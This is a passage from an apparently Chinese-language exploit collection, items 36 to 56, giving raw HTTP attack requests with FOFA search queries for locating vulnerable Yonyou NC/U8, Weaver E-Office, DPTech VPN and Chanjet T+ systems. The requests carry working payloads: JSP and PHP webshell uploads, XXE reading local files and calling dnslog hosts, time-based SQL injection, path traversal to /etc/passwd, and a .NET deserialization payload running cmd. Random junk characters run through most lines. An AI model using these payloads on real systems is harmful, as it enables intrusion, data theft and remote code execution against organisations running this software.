/ K! ]7 D4 |0 d+ s/ O, z; L' u4 iPOST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1$ ~; ?% H2 H9 S
Host: 203.25.218.166:8888
+ {5 @7 J! U# JUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
, ?: F! N6 ` [Accept-Encoding: gzip, deflate
8 H- S' E+ `# |- r/ JAccept: */*" U( U* E' E% Z F' j6 L
Connection: close J) n5 B+ p/ _. W
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA+ E* w3 U$ [' y! L: }: t. {
Content-Length: 190$ c. I+ I6 G# O- G( w
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df04 i$ Z% q% C9 G6 v9 G6 Y
% v* s: C$ G C# o+ n, u--fd28cb44e829ed1c197ec3bc71748df0
8 H% z9 {, I5 T3 C+ f7 v* _7 BContent-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"7 L. Y( v& E/ e& J* r
% W1 I+ d3 s& L: }$ w0 g5 H
<%out.println(1111*1111);%>
8 g" v. W0 L2 [1 z8 c* Z# C--fd28cb44e829ed1c197ec3bc71748df0--/ Y3 w7 O% ~; |. @1 E3 L
' i! n7 o& D8 Y" Y8 _* ~0 C5 r* Y, {* I# H. m
36. 用友NC-Cloud soapFormat XXE
' b+ v7 Z9 O8 D2 l! _* [FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"+ D) l2 Y& m2 y$ Q: \/ E
POST /uapws/soapFormat.ajax HTTP/1.1
# h7 f/ T! ^4 _: t6 E+ n$ k. KHost: 192.168.40.130:8989* j, s( F0 o' M: W7 B* S1 t. G
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0! m* c$ Y% x" Q- B, A/ A$ `; I
Content-Length: 263
- h# }, _8 y5 G/ L: TAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
% E! m. y* K( c) IAccept-Encoding: gzip, deflate3 o! F$ e: m. Y$ l; O% i
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
H% W! }3 {9 W) aConnection: close1 P. v5 p5 ?* @ l" P: C4 }
Content-Type: application/x-www-form-urlencoded/ T* ]! l2 G$ S
Upgrade-Insecure-Requests: 1
. |* a# _$ i# J/ ~
+ ^( Q& }- v- X; m& Jmsg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a
( n: e( }5 o. {4 X6 I: H3 ]5 M1 U$ y6 J$ R9 l0 Z& E
' K% w3 G" E. j37. 用友NC-Cloud IUpdateService XXE B+ `, M' H A( L" T
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/", c* r& \! D$ |9 D; P
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1" w# ^0 m4 E8 Y7 Z# [$ Q9 ?
Host: 192.168.40.130:8989
7 a/ b8 S- R8 T8 [. B& aUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36: R- c8 c( P \
Content-Length: 421) B s8 U+ ~0 w# ^
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9, t* Q# ^" P) V+ ~' p$ S
Accept-Encoding: gzip, deflate, u. k! s) l- {0 T' F, ?6 s; I
Accept-Language: zh-CN,zh;q=0.99 @6 P- e) F' z/ k2 z/ |
Connection: close
' [8 U: W: l& d# KContent-Type: text/xml;charset=UTF-8# X7 E2 i( [! z& M: g4 t, p
SOAPAction: urn:getResult
7 m9 U8 ^3 d1 m1 ?0 [* }7 \9 w7 ZUpgrade-Insecure-Requests: 1$ w; ^$ _' z% j: ^( u5 k6 }
+ D( Q/ G! j7 Q
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
1 l" K6 L' V0 O1 L1 e( O8 _( z<soapenv:Header/>
/ x4 ^- T) }% n2 ?8 J8 m<soapenv:Body>
0 E$ B# D' f/ x! d+ u<iup:getResult>8 p% P- {% ~; o5 K# O
<!--type: string-->; r& n* t! \* B0 T; _7 }
<iup:string><![CDATA[
) A% _6 n3 j# O0 a3 t( b: i<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>) N" m+ C6 e3 a R1 F
<xxx/>]]></iup:string>
! K2 C7 N2 @/ v- G' ]9 w" V</iup:getResult>% s7 ^. r4 ]0 i4 r- Q9 v/ h" O
</soapenv:Body>& q# ]3 r6 c% C, y" w
</soapenv:Envelope>5 M: J) g( G6 I
7 v. z T& n9 [+ A% F
4 G/ {) Y9 k( u$ [5 g$ d" ^. R" P9 j$ `) Y7 }* c+ b
38. 用友U8 Cloud smartweb2.RPC.d XXE' X4 B' e- [' Y7 U. c
FOFA:app="用友-U8-Cloud"# c2 [+ V3 F6 _8 S% Z7 _7 S
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
2 d) L% c" \0 |# a) q$ aHost: 192.168.40.131:8088/ ^8 s; S9 g% p& O3 [
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.256 ]2 @* x# `* D3 C/ Z7 J
Content-Length: 260- W7 I# u2 [5 S8 u
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
4 K* y$ r w! z* c( O& @Accept-Encoding: gzip, deflate
8 z/ h. Y7 x1 @* MAccept-Language: zh-CN,zh;q=0.99 x4 W2 S2 q* q8 }% p4 R
Connection: close
: g* d3 G* W+ p. RContent-Type: application/x-www-form-urlencoded* _* z) f& P# b& Y+ Y9 V0 Z0 o
3 I& Y- k% H+ t3 D__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>
0 h0 Z8 Q" P2 H/ Z& s/ @, o
' X9 N! x& z- v" U
% u' y1 z7 [3 A6 V. f. ~6 u39. 用友U8 Cloud RegisterServlet SQL注入
5 Q) x* T' ~' ?! B# ?! VFOFA:title="u8c"2 f [, w3 F2 F0 m) @
POST /servlet/RegisterServlet HTTP/1.1
( b+ A$ F" ]! ]! a) Y4 XHost: 192.168.86.128:8089
+ y. n( U% {: ~2 M$ a$ B8 sUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
5 |6 z2 l- H! G3 K0 z4 K7 z3 R6 @Connection: close! J1 H1 `$ o6 _6 ^ q1 _7 G- r
Content-Length: 857 n9 g4 O' Z, I& L: i
Accept: */*
( a- e" w7 D, K- v5 h5 p. [Accept-Language: en' D2 L: G' N# D9 Q- l+ _6 j8 K6 Z
Content-Type: application/x-www-form-urlencoded# r) F1 |$ \8 E
X-Forwarded-For: 127.0.0.1
/ k) l" L- l' l4 `Accept-Encoding: gzip' D4 D) x J, D
8 v3 y4 {- v; Xusercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--+ p, n9 E# i4 F2 X) [5 ]" c8 b
* m- [1 t# ^7 d( f
2 w! m. A& t) U) N3 n0 u40. 用友U8-Cloud XChangeServlet XXE% `: [# z/ v& U9 f9 |! i
FOFA:app="用友-U8-Cloud"
. G" p/ P# \4 w" P2 E& w3 S* `" ?5 NPOST /service/XChangeServlet HTTP/1.1
; i. N {; i8 m# g% J: RHost: x.x.x.x
: k! D/ [" w) N" gUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36* ~8 c0 \* D* \5 d& _, l6 m( g
Content-Type: text/xml
* v2 |) S, N% F* j7 WConnection: close
! b6 d3 r' j7 Q* a' t; `9 S2 r |
; A7 `& F" a( y0 Q( [<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r># G% t9 i4 E: ^. I( f
" L E J1 M% ~/ G+ `% _2 H
. O) k4 T/ \4 s# G* M- X9 l' J41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
. N/ t/ @& z+ U3 t( XFOFA:app="用友-U8-Cloud"
( Z+ t5 \* w- N- r8 }: z8 F1 bGET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
6 q& g' |6 }9 s# n6 [5 HHost:
6 n6 |1 }% r2 k4 K) i# h8 PUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.157 y$ M9 B- {3 j( X2 c$ N
Content-Type: application/json7 g# s! k% {" [% A* E7 M- n6 m
Accept-Encoding: gzip
% ?+ ~3 M; _9 D) r9 Z7 _" T9 {! nConnection: close
# e! U4 M# O: E: m8 S# E5 P% \- V1 L; j3 m h
) b' y. O' }% ]' G
42. 用友GRP-U8 SmartUpload01 文件上传
* i% k$ c) ^3 }2 mFOFA:app="用友-GRP-U8"
0 B9 D( H! c1 {" C$ n9 ^- kPOST /u8qx/SmartUpload01.jsp HTTP/1.1
0 s! l( n# d8 UHost: x.x.x.x
- c3 h! h' [' v# y9 v: vContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
. x+ R) h Y8 [. r2 j1 VUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36; S0 J& X. p) J+ E7 K" U
' t! |0 ?/ M% p8 x D
PAYLOAD
% I7 c$ O) A1 X6 s
/ [+ D! {# Y' r, Q! m# q* g, a) G9 u" d! \* U7 z5 M. q
http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml; N; _) ~" g( A
9 ], P5 {: d) i+ L5 g* Q+ \43. 用友GRP-U8 userInfoWeb SQL注入致RCE
: O4 T p" Q$ V3 BFOFA:app="用友-GRP-U8", x( X+ W3 S) i! I3 _( F3 `% p
POST /services/userInfoWeb HTTP/1.1
1 | p' j2 i/ d& c3 uHost: your-ip% [9 }6 f r5 a6 b* B0 L, s# k
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36! h& Y; G: E( H1 P, U8 m
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
. v; W1 e6 n8 [! ~+ c1 mAccept-Encoding: gzip, deflate
+ e2 W M6 o- f8 G8 Z% EAccept-Language: zh-CN,zh;q=0.9: n( v* j9 T( \, a
Connection: close4 m8 ]% P( U/ U* x% t( q
SOAPAction:
* x% ]1 ` i) n. |Content-Type: text/xml;charset=UTF-8
8 \2 Y! a2 x# U1 k3 ?2 x8 R
/ I) h0 I8 G; G! h2 g! A2 }4 k<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
8 W, x% V8 B( y" H; { <soapenv:Header/>4 C# u# S t0 N D+ m) A
<soapenv:Body>
# Z9 |- M" A+ U. Q8 x& ? <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">& _& D8 D7 ]" ? q' Z
<userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
" D/ ^# L* R9 Y, H7 | </ser:getUserNameById>
. P4 N; X. E- N( [% B </soapenv:Body>1 J- n& g4 Q/ f6 E7 R q3 k% ?
</soapenv:Envelope>5 Y+ B1 ], M- e( y
, P( G6 J" o6 J& Y1 U7 V
8 }; i) j, t7 b2 ?. O
44. 用友GRP-U8 bx_dj_check.jsp SQL注入
/ A$ Q) J4 C g6 HFOFA:app="用友-GRP-U8"
. @# e* X' f* H: t1 VGET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.19 x# }! M0 m+ P0 d6 u
Host: your-ip
) ]' k# d, z2 P3 v: f$ ZUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36% [: @$ `# b6 {; S) v
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.79 o7 R F+ _& K# b$ R9 ~
Accept-Encoding: gzip, deflate
6 h. p/ a. Q) {# l! n* w* l5 Z6 m" AAccept-Language: zh-CN,zh;q=0.9
2 T1 t# y1 F. [Connection: close: [4 _9 U' c' W
: \- n4 V% A% t k( ^! c5 @! b* x, ?! X0 D, G
45. 用友GRP-U8 ufgovbank XXE
8 r! q" L1 @0 p% ~4 n! zFOFA:app="用友-GRP-U8"
! T* d `. h8 B7 n- BPOST /ufgovbank HTTP/1.1
- [& U" o3 J8 r7 h, wHost: 192.168.40.130:222
7 T- c; W5 f9 h' s* ~User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0/ q% D/ Y/ g9 z8 s4 I
Connection: close
) r; d3 }6 Z2 f$ Z! y/ h& d/ ]. GContent-Length: 161
" [6 {, ?$ q. f# t" ~$ MAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8! e- h; [, q Y8 A
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2: C/ J$ v; P9 P* @' W; _
Content-Type: application/x-www-form-urlencoded
5 n! y' r1 l6 GAccept-Encoding: gzip0 X/ u4 p/ ?* [
4 L( n, n( f* s. F/ V1 e
reqData=<?xml version="1.0"?>
, g6 g# z5 p; k, u* ^<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest
1 s; z8 `& R4 X3 E
B3 D5 C: d3 p7 P7 d& _& X* O/ p) v2 [$ D3 t: }" R" |" M1 A& U
46. 用友GRP-U8 sqcxIndex.jsp SQL注入
5 E( Z2 ]; [9 A( V1 {, vFOFA:app="用友-GRP-U8"
$ X$ ~5 c) P) ~- Y1 kGET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
3 L8 O9 [9 F. V+ ?8 cHost: your-ip
6 v& [* G9 }# k( K% y6 b `& mUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.360 V( b- L8 z/ Q$ m9 k) Z" z( |$ y+ Z
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.75 |' I. S/ F3 ~8 A/ w' B
Accept-Encoding: gzip, deflate N4 r4 s- ~1 _
Accept-Language: zh-CN,zh;q=0.9
, d; m! T; p5 W7 ~: WConnection: close. z$ s: d) D4 P* F% @ m6 P/ m
. k# C! q8 ~' Q6 z$ f
1 ]: ^( _5 E: f- L, [6 }47. 用友GRP A++Cloud 政府财务云 任意文件读取
* f' h. C4 K, n4 y! U6 }' L4 |7 `FOFA:body="/pf/portal/login/css/fonts/style.css"% l# Z0 E8 o/ `7 y" g6 H3 k0 U! [
GET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.1
* C$ J& N- R# A: HHost: x.x.x.x
4 p" `$ m0 w1 R% m7 [, _8 ~& `" KCache-Control: max-age=0 R( Y9 c2 h: N/ [
Upgrade-Insecure-Requests: 1
) F, l; u% q5 [. aUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
& o: q7 @6 k* _2 f5 y# v' VAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7( P9 G0 T( G. U _, E: X5 ?
Accept-Encoding: gzip, deflate, br
- W9 x9 i+ K9 W" V0 YAccept-Language: zh-CN,zh;q=0.9
& p$ r* a4 S( I9 E8 u6 G8 vIf-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT- K9 z4 ]/ o' {* V8 [+ i2 @
Connection: close
0 X) f* J B5 E7 O% r5 k9 I/ @4 Y3 f- D/ U, R
) Y) L; ^" Z# j* X) R6 S, |5 [3 ?% p) O% J
48. 用友U8 CRM swfupload 任意文件上传8 F6 a% Q" _2 T. F; s. ]3 Q5 V
FOFA:title="用友U8CRM"
! A" t& X/ A( ~4 iPOST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
- |' t! u& O% j; S4 W$ [3 hHost: your-ip9 d% m3 {7 U) a9 C5 _* L
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
( t2 Q/ {1 L t8 V1 {/ gAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
X1 ]0 }+ U7 K; k+ WAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
* o* y2 c* @. i( f# ]1 @Accept-Encoding: gzip, deflate0 [& ]4 Z$ Y1 L! Z# J1 M
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855
: o1 y# a l7 P9 t" t------269520967239406871642430066855
& J; [3 I! F! V3 w9 G0 l8 U3 \* cContent-Disposition: form-data; name="file"; filename="s.php"
m4 M |6 o# e# x& g" T( C1231
( M$ j# e. X' eContent-Type: application/octet-stream- {: E) J" U2 s0 a6 D( _
------269520967239406871642430066855
8 _- Y' ^0 C3 P' n1 y& o) `Content-Disposition: form-data; name="upload"; U0 p. w: ^" F$ a
upload
* z& s4 g- j m f6 @8 B( V; ?------269520967239406871642430066855--8 p3 W; H3 A8 l
( A( H0 }8 a f) V% e5 }0 x- F
" ^9 j+ N+ x. L; G5 l/ _2 I
49. 用友U8 CRM系统uploadfile.php接口任意文件上传) b3 r& y/ N& q
FOFA:body="用友U8CRM"
+ X! ^' n/ M* V! v$ P+ Q9 C, c1 H4 S/ a, Y1 t* A# s
POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
) H9 w+ V$ T) D+ N% jHost: x.x.x.x2 ^' X2 n% E# s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0! D* ]9 d! f' Y+ d$ E `
Content-Length: 329
! e4 V o2 \5 x# Q1 e% hAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.88 u' k7 ^9 T0 x
Accept-Encoding: gzip, deflate6 i. n/ _, y- z" @2 L
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.29 Y/ O" ?7 |! S. ?) p
Connection: close
F7 e O4 H0 _! P5 b/ J/ LContent-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w6 U8 O0 M- s* ]$ X( e6 w
3 @. Q0 o# v" j$ h4 O- W
-----------------------------vvv3wdayqv3yppdxvn3w
/ v5 ?" i$ P _. yContent-Disposition: form-data; name="file"; filename="%s.php "
- F( u- @# X6 v6 m8 FContent-Type: application/octet-stream7 X% s! E/ f8 C
$ F3 h" c. V) J9 D. A
wersqqmlumloqa5 P/ T) i0 f' [# K: _
-----------------------------vvv3wdayqv3yppdxvn3w% s, _0 }+ I2 F7 |' K
Content-Disposition: form-data; name="upload"6 E0 L, H U% C% T, p
3 Y6 U( e0 V6 ], F9 s/ G
upload
% l8 O& V4 p& m( T5 K$ q X-----------------------------vvv3wdayqv3yppdxvn3w-- Q6 m& k$ d- F0 i( ^* [' _
7 d* ^8 g, ?2 B) l' s
( N8 A% e7 z+ M/ M C& Khttp://x.x.x.x/tmpfile/updB3CB.tmp.php
4 {. \2 N: F' k, G- D
3 l7 F: r% [. U9 Q. {1 h, ]50. QDocs Smart School 6.4.1 filterRecords SQL注入, S8 V8 G' B2 n" e
FOFA:body="close closebtnmodal"$ J) a% c3 n a) L0 f% g- l F; t
POST /course/filterRecords/ HTTP/1.1
+ {/ e$ _3 ?% R: D+ s7 U$ Z6 T2 ?Host: x.x.x.x
4 P K5 u9 G" N. w5 C, y" iUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
! k( G1 Q7 Y) h5 w/ MConnection: close7 l6 |8 b- U5 G
Content-Length: 224
2 ?4 }5 P2 o& o4 y% xAccept: */*
% m6 w& B2 G' J' }. @5 d' CAccept-Language: en$ G* D, W5 k2 `; Y: N
Content-Type: application/x-www-form-urlencoded
$ O: k* C: n5 {. aAccept-Encoding: gzip
# a8 I D8 b$ M5 L3 M, `( d% J* [3 K, W$ Y5 m- D+ j8 n* e
searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1& X7 ]/ @7 M- D: b1 q
- t7 L1 E" I3 C, W' u/ W! Z. s
$ p- u8 ^0 a. C% h3 { n
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
- I9 u5 \6 u0 [) U9 u- l" f- lFOFA:app="云时空社会化商业ERP系统"
2 W: D; W E; K& ?& D N1 t+ |7 AGET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
/ b8 w& K& C* \/ [0 n1 s; IHost: your-ip- P6 K7 _8 C9 |
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36. T# x6 k/ Y7 [! u% m
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
: @7 n m# I' W" m: ~3 U% E5 ~ [( b. hAccept-Encoding: gzip, deflate
9 ~* ]) R% B" HAccept-Language: zh-CN,zh;q=0.9
1 ~7 ~ C0 L. t9 g6 }+ \' i/ P2 ]Connection: close! E! r- Y6 i4 ]1 z
7 g# }1 l. v* c
5 r. o1 k0 f. g# r
52. 泛微E-Office json_common.php sql注入4 K0 ^; P/ Y# i
FOFA:app="泛微-EOffice"# @+ N0 k. e4 ?) [
POST /building/json_common.php HTTP/1.1
2 z" ?0 a/ y7 |1 u0 h. P) LHost: 192.168.86.128:8097
# N" U; v; q& ?3 L" m( G+ W! TUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
4 C2 ]- _. A) t# GConnection: close
$ M$ {) F2 Y# kContent-Length: 874 f! F7 ~" j3 L" i V8 D7 {
Accept: */*
! l" c* c. i% Q) M2 QAccept-Language: en( ^+ y2 S# I/ g- g9 N$ @- q. f
Content-Type: application/x-www-form-urlencoded' i2 ~2 y- b2 ~5 J- I
Accept-Encoding: gzip
0 C* M6 d8 ?0 F# f) C' l, s) \ J$ p$ T" `% Q
tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333
; R. \. A8 \- a+ ?& F/ b7 U- e, o5 `( b6 d
u o& D2 `) F B( ?7 ~) Q
53. 迪普 DPTech VPN Service 任意文件上传
0 ~" h( |& e/ j1 ~* P l$ y3 y {+ vFOFA:app="DPtech-SSLVPN", I! i* w0 J1 n( ~
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
5 b+ K$ P: m' Y/ M- J, Q6 h: m$ ^
7 @0 K! r f* @* j) x6 k8 U" X9 \. U! G$ o& N- c+ k& ?, {
54. 畅捷通T+ getstorewarehousebystore 远程代码执行# H* x7 a: J3 v, E# @7 I
FOFA:app="畅捷通-TPlus"
. ^ m3 [$ K- Z6 O第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件8 _; u, T% t( C) k
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"9 e& W) O$ Q! Q- |
- { C2 q$ q8 L8 x: e& o3 Q' `6 n' s8 r; Q! N& q
完整数据包
7 B* o3 h/ f* t, p0 A1 I( CPOST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.11 |4 i& g+ K+ ?" i }% H
Host: x.x.x.x3 Q! e9 @) S. k
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
6 o3 ]: H1 Q. G: n7 W9 i* A3 eContent-Length: 593
# Q, [, e& h, L0 Q3 g# L% I. X( H$ T, S9 W
{
& D/ b9 {0 E1 h P6 q"storeID":{# v% B0 `* l3 l @. K6 m) s$ G
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",' |+ S3 P4 ^" y, W0 p
"MethodName":"Start",
5 `5 g2 A( @0 R! ~8 z "ObjectInstance":{
) \ `2 }( Q& ^1 s0 U2 X1 Z" r "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
/ V) x4 V; Y. Z1 K "StartInfo":{; S$ x, [1 K8 G: K9 _1 d
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
3 s4 ]) t( a* ` F9 S# W "FileName":"cmd",/ s* Q6 N/ g: K2 R
"Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"$ a2 k7 n: F2 M+ L& o' E4 ~
}: i/ _1 s" N: A% O- T/ b
}
! i" m1 B! ?& r5 u4 ~* m* b' N }5 D+ m! _# o( u7 A- H3 O" O. I
}3 ? d( |1 m* D% {$ G5 @9 T6 x
, @# M$ k$ ]: R& q* s, }& C8 _/ u1 Q4 b3 C' f
第二步,访问如下url
6 L g' l |9 |0 G) L- m/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt
% @' M) J+ i) q# d4 D0 S y
: O% [7 V- A l3 p1 \. S
0 e8 q- N1 H2 K' s# M55. 畅捷通T+ getdecallusers信息泄露
, M8 S' q/ E3 a0 X( [FOFA:app="畅捷通-TPlus"" Y; Q" e2 K( ^' z2 n0 t
第一步,通过 O' p0 `8 w B" z) ]
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie4 U+ k8 r4 C0 Z
第二步,利用获取到的Cookie请求8 n# I! i+ s0 o1 g1 M/ ^: Y$ F5 }
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers
$ V. g+ a' e8 Q6 R+ ]5 Y# Y7 |
: v( R2 w* t+ r% H56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE0 I$ k9 ~( n# ^8 U/ v
FOFA: app="畅捷通-TPlus"- M# W* z Q @1 e% ~2 c: P
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
; S( s! W) x# P8 \" n$ i: |/ b" g+ LHost: x.x.x.x+ l# u9 g2 y( b* ?' l5 ^, r: ^
